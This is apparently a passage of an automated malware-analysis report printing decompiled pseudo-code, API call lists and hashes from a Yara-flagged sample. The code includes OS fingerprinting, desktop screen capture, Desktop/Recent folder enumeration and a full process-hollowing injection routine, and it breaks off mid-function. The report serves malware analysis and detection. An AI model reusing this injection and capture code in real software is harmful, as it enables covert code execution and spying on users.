                                    										_v348 =  *(__esi + 8);
                                    										_v344 = 0xb;
                                    										__eax = "Starter";
                                    										_v340 = "Starter";
                                    										_v336 = 0xb;
                                    										__edx =  &_v348;
                                    										__ecx = 1;
                                    										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v372);
                                    										__edx = _v372;
                                    										__eax = __esi + 8;
                                    										__eax = E240130DC(__esi + 8, __edx);
                                    										goto L123;
                                    									case 8:
                                    										 &_v376 =  *(__esi + 8);
                                    										_v348 =  *(__esi + 8);
                                    										_v344 = 0xb;
                                    										__eax = "Business N";
                                    										_v340 = "Business N";
                                    										_v336 = 0xb;
                                    										__edx =  &_v348;
                                    										__ecx = 1;
                                    										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v376);
                                    										__edx = _v376;
                                    										__eax = __esi + 8;
                                    										__eax = E240130DC(__esi + 8, __edx);
                                    										goto L123;
                                    									case 9:
                                    										 &_v380 =  *(__esi + 8);
                                    										_v348 =  *(__esi + 8);
                                    										_v344 = 0xb;
                                    										__eax = "Premium N";
                                    										_v340 = "Premium N";
                                    										_v336 = 0xb;
                                    										__edx =  &_v348;
                                    										__ecx = 1;
                                    										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v380);
                                    										__edx = _v380;
                                    										__eax = __esi + 8;
                                    										__eax = E240130DC(__esi + 8, __edx);
                                    										goto L123;
                                    									case 0xa:
                                    										 &_v384 =  *(__esi + 8);
                                    										_v348 =  *(__esi + 8);
                                    										_v344 = 0xb;
                                    										__eax = "Enterprise N";
                                    										_v340 = "Enterprise N";
                                    										_v336 = 0xb;
                                    										__edx =  &_v348;
                                    										__ecx = 1;
                                    										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v384);
                                    										__edx = _v384;
                                    										__eax = __esi + 8;
                                    										__eax = E240130DC(__esi + 8, __edx);
                                    										goto L123;
                                    									case 0xb:
                                    										 &_v388 =  *(__esi + 8);
                                    										_v348 =  *(__esi + 8);
                                    										_v344 = 0xb;
                                    										__eax = "Ultimate N";
                                    										_v340 = "Ultimate N";
                                    										_v336 = 0xb;
                                    										__edx =  &_v348;
                                    										__ecx = 1;
                                    										0x240206c0 = E24015C78(0x240206c0, __ebx, 1,  &_v348, __edi, __esi,  &_v388);
                                    										__edx = _v388;
                                    										__eax = __esi + 8;
                                    										__eax = E240130DC(__esi + 8, __edx);
                                    										goto L123;
                                    								}
                                    							}
                                    						} else {
                                    							_v440 = _t584;
                                    							_v436 = 0;
                                    							E24015C78("Unknown Platform ID (%d)", _t522, 0,  &_v440, _t584, _t586,  &_v432);
                                    							E240130DC(_t586 + 8, _v432);
                                    							goto L123;
                                    						}
                                    					}
                                    				}
                                    				L1:
                                    				_push(0);
                                    				_push(0);
                                    				_t523 = _t523 - 1;
                                    				if(_t523 != 0) {
                                    					goto L1;
                                    				} else {
                                    					_push(__edi);
                                    					_t586 = __eax;
                                    					_push(_t588);
                                    					_push(0x240205d0);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t589;
                                    					 *__eax = 0;
                                    					E240130DC(__eax + 8, "Unknown");
                                    					 *((intOrPtr*)(_t586 + 0x1c)) = 0;
                                    					 *(_t586 + 0x10) = 0;
                                    					 *((intOrPtr*)(_t586 + 0x14)) = 0;
                                    					 *((intOrPtr*)(_t586 + 0x18)) = 0;
                                    					 *(_t586 + 0x20) = 0;
                                    					 *(_t586 + 0x24) = 0;
                                    					 *_t586 = 0;
                                    					 *((char*)(_t586 + 1)) = 0;
                                    					_t522 = 1;
                                    					_v328.dwOSVersionInfoSize = 0x11c;
                                    					if(GetVersionExW( &_v328) == 0) {
                                    						_t522 = 0;
                                    						_v328.dwOSVersionInfoSize = 0x94;
                                    						if(GetVersionExW( &_v328) == 0) {
                                    							_v328.dwOSVersionInfoSize = 0;
                                    						}
                                    					}
                                    					goto L5;
                                    				}
                                    			}
                                    0x24020290
                                    0x24020295
                                    0x2402029b
                                    0x240202a2
                                    0x240202a8
                                    0x240202b2
                                    0x240202b7
                                    0x240202bd
                                    0x240202c0
                                    0x00000000
                                    0x00000000
                                    0x2402000f
                                    0x2401ffb1
                                    0x2401fa47
                                    0x2401fa50
                                    0x2401fee5
                                    0x2401ff62
                                    0x2401ff68
                                    0x2401ff75
                                    0x2401ff7b
                                    0x2401ff92
                                    0x2401ffa0
                                    0x2401fee7
                                    0x2401feee
                                    0x2401ff0b
                                    0x2401ff35
                                    0x2401ff51
                                    0x2401ff37
                                    0x2401ff3f
                                    0x2401ff3f
                                    0x2401ff1c
                                    0x2401ff24
                                    0x2401ff24
                                    0x2401fef7
                                    0x2401feff
                                    0x2401feff
                                    0x2401feee
                                    0x00000000
                                    0x2401fee5
                                    0x2401fa56
                                    0x2401fa5f
                                    0x2401fa72
                                    0x2401fa7c
                                    0x2401fa7c
                                    0x2401fa61
                                    0x2401fa69
                                    0x2401fa69
                                    0x2401fa88
                                    0x00000000
                                    0x2401fa8e
                                    0x2401faaa
                                    0x2401fab0
                                    0x2401fab6
                                    0x2401fe91
                                    0x2401fe9b
                                    0x2401fea1
                                    0x2401fead
                                    0x2401feb3
                                    0x2401feca
                                    0x2401fed8
                                    0x00000000
                                    0x2401fed8
                                    0x2401fac2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x2401fb20
                                    0x2401fb26
                                    0x2401fb32
                                    0x2401fb38
                                    0x2401fb4f
                                    0x2401fb5d
                                    0x00000000
                                    0x00000000
                                    0x2401fb6e
                                    0x2401fb71
                                    0x2401fb77
                                    0x2401fb7e
                                    0x2401fb83
                                    0x2401fb89
                                    0x2401fb90
                                    0x2401fb96
                                    0x2401fba0
                                    0x2401fba5
                                    0x2401fbab
                                    0x2401fbae
                                    0x00000000
                                    0x00000000
                                    0x2401fbbf
                                    0x2401fbc2
                                    0x2401fbc8
                                    0x2401fbcf
                                    0x2401fbd4
                                    0x2401fbda
                                    0x2401fbe1
                                    0x2401fbe7
                                    0x2401fbf1
                                    0x2401fbf6
                                    0x2401fbfc
                                    0x2401fbff
                                    0x00000000
                                    0x00000000
                                    0x2401fc10
                                    0x2401fc13
                                    0x2401fc19
                                    0x2401fc20
                                    0x2401fc25
                                    0x2401fc2b
                                    0x2401fc32
                                    0x2401fc38
                                    0x2401fc42
                                    0x2401fc47
                                    0x2401fc4d
                                    0x2401fc50
                                    0x00000000
                                    0x00000000
                                    0x2401fc61
                                    0x2401fc64
                                    0x2401fc6a
                                    0x2401fc71
                                    0x2401fc76
                                    0x2401fc7c
                                    0x2401fc83
                                    0x2401fc89
                                    0x2401fc93
                                    0x2401fc98
                                    0x2401fc9e
                                    0x2401fca1
                                    0x00000000
                                    0x00000000
                                    0x2401fcb2
                                    0x2401fcb5
                                    0x2401fcbb
                                    0x2401fcc2
                                    0x2401fcc7
                                    0x2401fccd
                                    0x2401fcd4
                                    0x2401fcda
                                    0x2401fce4
                                    0x2401fce9
                                    0x2401fcef
                                    0x2401fcf2
                                    0x00000000
                                    0x00000000
                                    0x2401fd03
                                    0x2401fd06
                                    0x2401fd0c
                                    0x2401fd13
                                    0x2401fd18
                                    0x2401fd1e
                                    0x2401fd25
                                    0x2401fd2b
                                    0x2401fd35
                                    0x2401fd3a
                                    0x2401fd40
                                    0x2401fd43
                                    0x00000000
                                    0x00000000
                                    0x2401fd54
                                    0x2401fd57
                                    0x2401fd5d
                                    0x2401fd64
                                    0x2401fd69
                                    0x2401fd6f
                                    0x2401fd76
                                    0x2401fd7c
                                    0x2401fd86
                                    0x2401fd8b
                                    0x2401fd91
                                    0x2401fd94
                                    0x00000000
                                    0x00000000
                                    0x2401fda5
                                    0x2401fda8
                                    0x2401fdae
                                    0x2401fdb5
                                    0x2401fdba
                                    0x2401fdc0
                                    0x2401fdc7
                                    0x2401fdcd
                                    0x2401fdd7
                                    0x2401fddc
                                    0x2401fde2
                                    0x2401fde5
                                    0x00000000
                                    0x00000000
                                    0x2401fdf6
                                    0x2401fdf9
                                    0x2401fdff
                                    0x2401fe06
                                    0x2401fe0b
                                    0x2401fe11
                                    0x2401fe18
                                    0x2401fe1e
                                    0x2401fe28
                                    0x2401fe2d
                                    0x2401fe33
                                    0x2401fe36
                                    0x00000000
                                    0x00000000
                                    0x2401fe47
                                    0x2401fe4a
                                    0x2401fe50
                                    0x2401fe57
                                    0x2401fe5c
                                    0x2401fe62
                                    0x2401fe69
                                    0x2401fe6f
                                    0x2401fe79
                                    0x2401fe7e
                                    0x2401fe84
                                    0x2401fe87
                                    0x00000000
                                    0x00000000
                                    0x2401fac2
                                    0x2401f977
                                    0x2402048c
                                    0x24020492
                                    0x240204a6
                                    0x240204b4
                                    0x00000000
                                    0x240204b4
                                    0x2401f971
                                    0x2401f96c
                                    0x2401f878
                                    0x2401f878
                                    0x2401f87a
                                    0x2401f87c
                                    0x2401f87d
                                    0x00000000
                                    0x2401f87f
                                    0x2401f881
                                    0x2401f882
                                    0x2401f886
                                    0x2401f887
                                    0x2401f88c
                                    0x2401f88f
                                    0x2401f892
                                    0x2401f89d
                                    0x2401f8a4
                                    0x2401f8a9
                                    0x2401f8ae
                                    0x2401f8b3
                                    0x2401f8b8
                                    0x2401f8bd
                                    0x2401f8c0
                                    0x2401f8c3
                                    0x2401f8c7
                                    0x2401f8c9
                                    0x2401f8e1
                                    0x2401f8e3
                                    0x2401f8e5
                                    0x2401f8fd
                                    0x2401f901
                                    0x2401f901
                                    0x2401f8fd
                                    0x00000000
                                    0x2401f8e1

                                    APIs
                                    • GetVersionExW.KERNEL32(0000011C), ref: 2401F8DA
                                    • GetVersionExW.KERNEL32(00000094,0000011C), ref: 2401F8F6
                                    • GetSystemInfo.KERNEL32(?,0000011C), ref: 2401F95C
                                      • Part of subcall function 24015C78: wvsprintfA.USER32(?,00000000,?), ref: 24015D0E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Version$InfoSystemwvsprintf
                                    • String ID: - Service Pack: %s$ Server (unknown edition)$%d.%d$%s %s$%s %s Server$%s (Build: %d$(unknown edition)$A$Business$Business N$Datacenter$Enterprise$Enterprise IA64$Enterprise N$Home Basic$Home Basic N$Premium$Premium N$Standard$Starter$Ultimate$Ultimate N$Unknown$Unknown Platform ID (%d)$Web$Windows 2000 Professional$Windows 2000 Server$Windows 2000 Server Datacenter$Windows 2000 Server Enterprise$Windows 2000 Server Web Edition$Windows 2003 Server$Windows 2003 Server (Release 2)$Windows 2003 Server Datacenter$Windows 2003 Server Enterprise$Windows 2003 Server Web Edition$Windows 2008$Windows 3.1$Windows 7$Windows 95$Windows 95 (Release 2)$Windows 98$Windows 98 SE$Windows Home Server$Windows ME$Windows NT %d.%d$Windows NT 4.0 Server$Windows NT 4.0 Server Datacenter$Windows NT 4.0 Server Enterprise$Windows NT 4.0 Server Web Edition$Windows Vista$Windows XP Home$Windows XP Professional$Windows XP Professional x64
                                    • API String ID: 3060546747-1031444156
                                    • Opcode ID: 76a644fe886fe04d2ac714b8c89d0fe76ddc629a9b06761855470f8c53fff949
                                    • Instruction ID: 71c93ff3c1d474e248a623fcec184ab3bb47703467734705ded63ca227e99c14
                                    • Opcode Fuzzy Hash: 76a644fe886fe04d2ac714b8c89d0fe76ddc629a9b06761855470f8c53fff949
                                    • Instruction Fuzzy Hash: B6726370A04B58CFEB61CB64C844BCAB7F4AB49308F4084E9D68DA7699D774DAC8CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 53%
                                    			E240145F0(char* __eax, intOrPtr __edx) {
                                    				char* _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				struct _WIN32_FIND_DATAA _v334;
                                    				char _v595;
                                    				void* _t45;
                                    				char* _t54;
                                    				char* _t64;
                                    				void* _t83;
                                    				intOrPtr* _t84;
                                    				char* _t90;
                                    				struct HINSTANCE__* _t91;
                                    				char* _t93;
                                    				void* _t94;
                                    				char* _t95;
                                    				void* _t96;
                                    
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				_v16 = _v8;
                                    				_t91 = GetModuleHandleA("kernel32.dll");
                                    				if(_t91 == 0) {
                                    					L4:
                                    					if( *_v8 != 0x5c) {
                                    						_t93 = _v8 + 2;
                                    						goto L10;
                                    					} else {
                                    						if( *((char*)(_v8 + 1)) == 0x5c) {
                                    							_t95 = E240145DC(_v8 + 2);
                                    							if( *_t95 != 0) {
                                    								_t14 = _t95 + 1; // 0x1
                                    								_t93 = E240145DC(_t14);
                                    								if( *_t93 != 0) {
                                    									L10:
                                    									_t83 = _t93 - _v8;
                                    									_push(_t83 + 1);
                                    									_push(_v8);
                                    									_push( &_v595);
                                    									L2401128C();
                                    									while( *_t93 != 0) {
                                    										_t90 = E240145DC(_t93 + 1);
                                    										_t45 = _t90 - _t93;
                                    										if(_t45 + _t83 + 1 <= 0x105) {
                                    											_push(_t45 + 1);
                                    											_push(_t93);
                                    											_push( &(( &_v595)[_t83]));
                                    											L2401128C();
                                    											_t94 = FindFirstFileA( &_v595,  &_v334);
                                    											if(_t94 != 0xffffffff) {
                                    												FindClose(_t94);
                                    												_t54 =  &(_v334.cFileName);
                                    												_push(_t54);
                                    												L24011294();
                                    												if(_t54 + _t83 + 1 + 1 <= 0x105) {
                                    													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
                                    													_push(0x105 - _t83 - 1);
                                    													_push( &(_v334.cFileName));
                                    													_push( &(( &(( &_v595)[_t83]))[1]));
                                    													L2401128C();
                                    													_t64 =  &(_v334.cFileName);
                                    													_push(_t64);
                                    													L24011294();
                                    													_t83 = _t83 + _t64 + 1;
                                    													_t93 = _t90;
                                    													continue;
                                    												}
                                    											}
                                    										}
                                    										goto L17;
                                    									}
                                    									_push(_v12);
                                    									_push( &_v595);
                                    									_push(_v8);
                                    									L2401128C();
                                    								}
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
                                    					if(_t84 == 0) {
                                    						goto L4;
                                    					} else {
                                    						_push(0x105);
                                    						_push( &_v595);
                                    						_push(_v8);
                                    						if( *_t84() == 0) {
                                    							goto L4;
                                    						} else {
                                    							_push(_v12);
                                    							_push( &_v595);
                                    							_push(_v8);
                                    							L2401128C();
                                    						}
                                    					}
                                    				}
                                    				L17:
                                    				return _v16;
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 2401460D
                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 2401461E
                                    • lstrcpyn.KERNEL32(?,?,?), ref: 2401464E
                                    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 240146B2
                                    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 240146E7
                                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 240146FA
                                    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 24014707
                                    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 24014713
                                    • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 24014747
                                    • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 24014753
                                    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 24014775
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                    • API String ID: 3245196872-1565342463
                                    • Opcode ID: ae15f84802420ba3dce09711200a096ca32d3c6b85d9d07c8a19301cc0faf9c5
                                    • Instruction ID: 360b943bc8dc9892bb07f38a47b037ce3c98c7562392fb1ee59750e0c93b4a38
                                    • Opcode Fuzzy Hash: ae15f84802420ba3dce09711200a096ca32d3c6b85d9d07c8a19301cc0faf9c5
                                    • Instruction Fuzzy Hash: 8C416C72A00259AFEB11DAF8CC88FDEB7EC9F59209F0040B5E94CEB154D7749E948B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E24054984(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, short _a4) {
                                    				void* _v8;
                                    				intOrPtr _v12;
                                    				char _v16;
                                    				void _v20;
                                    				long _v24;
                                    				long _v28;
                                    				long _v32;
                                    				intOrPtr _v36;
                                    				char _v37;
                                    				char _v44;
                                    				struct _PROCESS_INFORMATION _v60;
                                    				short _v80;
                                    				struct _CONTEXT _v332;
                                    				CHAR* _t107;
                                    				int _t120;
                                    				void* _t150;
                                    				int _t162;
                                    				signed int _t184;
                                    				intOrPtr _t195;
                                    				intOrPtr _t197;
                                    				signed int _t200;
                                    				void* _t202;
                                    				void* _t204;
                                    				void* _t205;
                                    				intOrPtr _t206;
                                    
                                    				_t204 = _t205;
                                    				_t206 = _t205 + 0xfffffeb8;
                                    				_v16 = __ecx;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				E24013524(_v12);
                                    				E24013524(_v16);
                                    				_push(_t204);
                                    				_push(0x24054bf2);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t206;
                                    				E24011CF0( &_v60, 0x10);
                                    				E24011CF0( &(_v332.ExtendedRegisters), 0x44);
                                    				_v332.ExtendedRegisters.cb = 0x44;
                                    				_v80 = _a4;
                                    				_t107 = E24013534(_v16);
                                    				if(CreateProcessA(E24013534(_v12), _t107, 0, 0, 0, 4, 0, 0,  &(_v332.ExtendedRegisters),  &_v60) == 0) {
                                    					_pop(_t195);
                                    					 *[fs:eax] = _t195;
                                    					_push(0x24054bf9);
                                    					return E240130AC( &_v16, 2);
                                    				} else {
                                    					_v37 = 1;
                                    					_push(_t204);
                                    					_push(0x24054bd0);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t206;
                                    					_v332.ContextFlags = 0x10002;
                                    					if(GetThreadContext(_v60.hThread,  &_v332) != 0 && ReadProcessMemory(_v60.hProcess, _v332.Ebx + 8,  &_v20, 4,  &_v24) != 0 && E2405493C(_v60.hProcess, _v20) >= 0 && _v8 != 0) {
                                    						_v36 =  *((intOrPtr*)(_v8 + 0x3c)) + _v8;
                                    						_v20 = VirtualAllocEx(_v60.hProcess,  *(_v36 + 0x34),  *(_v36 + 0x50), 0x3000, 4);
                                    						if(_v20 != 0 && WriteProcessMemory(_v60.hProcess, _v20, _v8,  *(_v36 + 0x54),  &_v28) != 0) {
                                    							_t202 = E24054924(_v36);
                                    							_t150 = ( *(_v36 + 6) & 0x0000ffff) - 1;
                                    							if(_t150 >= 0) {
                                    								_v44 = _t150 + 1;
                                    								_t184 = 0;
                                    								do {
                                    									_t200 = _t184 + _t184 * 4;
                                    									if(WriteProcessMemory(_v60.hProcess,  *((intOrPtr*)(_t202 + 0xc + _t200 * 8)) + _v20,  *((intOrPtr*)(_t202 + 0x14 + _t200 * 8)) + _v8,  *(_t202 + 0x10 + _t200 * 8),  &_v28) != 0) {
                                    										VirtualProtectEx(_v60.hProcess,  *((intOrPtr*)(_t202 + 0xc + _t200 * 8)) + _v20,  *(_t202 + 8 + _t200 * 8), E24054930( *((intOrPtr*)(_t202 + 0x24 + _t200 * 8))),  &_v32);
                                    									}
                                    									_t184 = _t184 + 1;
                                    									_t74 =  &_v44;
                                    									 *_t74 = _v44 - 1;
                                    								} while ( *_t74 != 0);
                                    							}
                                    							if(WriteProcessMemory(_v60.hProcess, _v332.Ebx + 8,  &_v20, 4,  &_v28) != 0) {
                                    								_v332.Eax =  *((intOrPtr*)(_v36 + 0x28)) + _v20;
                                    								_t162 = SetThreadContext(_v60.hThread,  &_v332);
                                    								asm("sbb eax, eax");
                                    								_v37 = _t162 + 1;
                                    							}
                                    						}
                                    					}
                                    					_pop(_t197);
                                    					 *[fs:eax] = _t197;
                                    					_push(0x24054bd7);
                                    					if(_v37 != 0) {
                                    						_t120 = ResumeThread(_v60.hThread);
                                    					} else {
                                    						_t120 = TerminateProcess(_v60, 0);
                                    					}
                                    					return _t120;
                                    				}
                                    			}

                                    APIs
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 24054A0D
                                    • GetThreadContext.KERNEL32(?,00010002), ref: 24054A41
                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,?,00010002), ref: 24054A66
                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,?,00010002), ref: 24054AB5
                                    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,?), ref: 24054ADE
                                    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,?,?,?,00003000,00000004,?), ref: 24054B27
                                    • VirtualProtectEx.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,?), ref: 24054B4F
                                    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000004,?), ref: 24054B72
                                    • SetThreadContext.KERNEL32(?,00010002,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000), ref: 24054B95
                                    • TerminateProcess.KERNEL32(?,00000000,24054BD7), ref: 24054BBC
                                    • ResumeThread.KERNEL32(?,24054BD7), ref: 24054BC7
                                      • Part of subcall function 2405493C: LoadLibraryA.KERNEL32(ntdll.dll,ZwUnmapViewOfSection,?,00000000,24054A7E,?,?,?,00000004,?,?,00010002), ref: 2405494C
                                      • Part of subcall function 2405493C: GetProcAddress.KERNEL32(00000000,ntdll.dll), ref: 24054952
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Memory$ThreadWrite$ContextVirtual$AddressAllocCreateLibraryLoadProcProtectReadResumeTerminate
                                    • String ID: D
                                    • API String ID: 4089571990-2746444292
                                    • Opcode ID: 2d0103c8c0fb3344d4af153e7ca549fb84544ecc34edc6d0bda3011a69407dd1
                                    • Instruction ID: 600e35fc45183da5deea688338b622767f82856e887568bf7e58f8c6832d402a
                                    • Opcode Fuzzy Hash: 2d0103c8c0fb3344d4af153e7ca549fb84544ecc34edc6d0bda3011a69407dd1
                                    • Instruction Fuzzy Hash: C381C4B1A00209AFEB51DBE9DC81FEEBBF8FF58304F104465E608E7255D674E9848B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E24037464(struct HWND__* __eax) {
                                    				struct tagRECT _v36;
                                    				intOrPtr _v40;
                                    				int _v56;
                                    				struct HBITMAP__* _v76;
                                    				void* _v80;
                                    				void* _v116;
                                    				struct HDC__* _t33;
                                    				struct HDC__* _t34;
                                    				struct HWND__* _t35;
                                    				int _t36;
                                    				intOrPtr* _t38;
                                    
                                    				_t38 =  &(_v36.right);
                                    				_t35 = __eax;
                                    				if(__eax == 0) {
                                    					_t35 = GetDesktopWindow();
                                    				}
                                    				_t33 = GetDC(_t35);
                                    				_t34 = CreateCompatibleDC(_t33);
                                    				if(_t35 == 0) {
                                    					_t36 = GetDeviceCaps(_t33, 8);
                                    					_v56 = GetDeviceCaps(_t33, 0xa);
                                    				} else {
                                    					GetClientRect(_t35,  &_v36);
                                    					_t36 = _v36.right - _v36.left;
                                    					_v40 = _v36.bottom - _v36.top;
                                    				}
                                    				_v76 = CreateCompatibleBitmap(_t33, _t36, _v56);
                                    				_v80 = SelectObject(_t34, _v76);
                                    				BitBlt(_t34, 0, 0, _t36, _v76, _t33, 0, 0, 0xcc0020);
                                    				SelectObject(_t34, _v116);
                                    				DeleteDC(_t34);
                                    				ReleaseDC(_t35, _t33);
                                    				return  *_t38;
                                    			}

                                    APIs
                                    • GetDesktopWindow.USER32 ref: 24037471
                                    • GetDC.USER32(00000000), ref: 24037479
                                    • CreateCompatibleDC.GDI32(00000000), ref: 24037481
                                    • GetClientRect.USER32(00000000,?), ref: 24037492
                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 240374B0
                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 240374BA
                                    • CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 240374CA
                                    • SelectObject.GDI32(00000000,00000000), ref: 240374D7
                                    • BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CC0020), ref: 240374F5
                                    • SelectObject.GDI32(00000000,0000000A), ref: 24037500
                                    • DeleteDC.GDI32(00000000), ref: 24037506
                                    • ReleaseDC.USER32(00000000,00000000), ref: 2403750D
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CapsCompatibleCreateDeviceObjectSelect$BitmapClientDeleteDesktopRectReleaseWindow
                                    • String ID:
                                    • API String ID: 337914687-0
                                    • Opcode ID: f1b76e16a75b4e8c41da1ba234a25fc9606e6697ddba96ae8bac77b0f0e9eb6f
                                    • Instruction ID: a966f1e2faad44930d1eb754137f7a6a547f067b3689c86d0d68619c88bcd98d
                                    • Opcode Fuzzy Hash: f1b76e16a75b4e8c41da1ba234a25fc9606e6697ddba96ae8bac77b0f0e9eb6f
                                    • Instruction Fuzzy Hash: 801160722457057FE311AAA88CC0F3F7AECDF96654F404919F988AF245DB74AC8087B2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 66%
                                    			E240409E4(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				char _v20;
                                    				void* _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				struct _WIN32_FIND_DATAA _v352;
                                    				char _v608;
                                    				void _v928;
                                    				char _v932;
                                    				char _v936;
                                    				char _v940;
                                    				char _v1196;
                                    				char _v1452;
                                    				char _v1456;
                                    				char _v1460;
                                    				char _v1464;
                                    				char _v1468;
                                    				void* _t88;
                                    				signed int _t108;
                                    				intOrPtr _t183;
                                    				void* _t189;
                                    				intOrPtr _t194;
                                    				void* _t205;
                                    				void* _t207;
                                    				void* _t209;
                                    				void* _t210;
                                    				intOrPtr _t211;
                                    
                                    				_t157 = __ebx;
                                    				_t209 = _t210;
                                    				_t211 = _t210 + 0xfffffa48;
                                    				_push(__esi);
                                    				_v1456 = 0;
                                    				_v1464 = 0;
                                    				_v1468 = 0;
                                    				_v1460 = 0;
                                    				_v940 = 0;
                                    				_v936 = 0;
                                    				_v932 = 0;
                                    				_v16 = 0;
                                    				_v20 = 0;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t209);
                                    				_push(0x24040d1e);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t211;
                                    				E24013088(_v12);
                                    				E24013480(_v8, 0x24040d34);
                                    				if(0 != 0) {
                                    					E24013480(_v8, 0x24040d44);
                                    					if(__eflags != 0) {
                                    						E24013480(_v8, "%RECENT%");
                                    						if(__eflags != 0) {
                                    							E24013480(_v8, "%DESKTOP%");
                                    							if(__eflags == 0) {
                                    								E2401673C("Desktop", __ebx,  &_v936, __esi, __eflags);
                                    								E24013388( &_v8, 0x24040d78, _v936);
                                    							}
                                    						} else {
                                    							E2401673C("Recent", __ebx,  &_v932, __esi, __eflags);
                                    							E24013388( &_v8, 0x24040d78, _v932);
                                    						}
                                    					} else {
                                    						E24016F20( &_v8, __ebx, __eflags);
                                    					}
                                    				} else {
                                    					E24016FAC( &_v8, __ebx, 0);
                                    				}
                                    				_t88 = E2401333C(_v8);
                                    				_t214 = _t88 - 3;
                                    				if(_t88 < 3) {
                                    					E24017064( &_v8, _t157, _t214);
                                    				}
                                    				if(E2401742C(_v8) != 0) {
                                    					_v28 = E24012658(1);
                                    					_v32 = E24012658(1);
                                    					_v24 = 0;
                                    					_push(_t209);
                                    					_push(0x24040c93);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t211;
                                    					E24013388( &_v940, 0x24040da8, _v8);
                                    					_v24 = FindFirstFileA(E24013534(_v940),  &_v352);
                                    					__eflags = _v24 - 0xffffffff;
                                    					if(_v24 != 0xffffffff) {
                                    						while(1) {
                                    							_t108 = FindNextFileA(_v24,  &_v352);
                                    							__eflags = _t108;
                                    							if(_t108 == 0) {
                                    								goto L18;
                                    							}
                                    							_t207 =  &_v352;
                                    							memcpy( &_v928, _t207, 0x50 << 2);
                                    							_t211 = _t211 + 0xc;
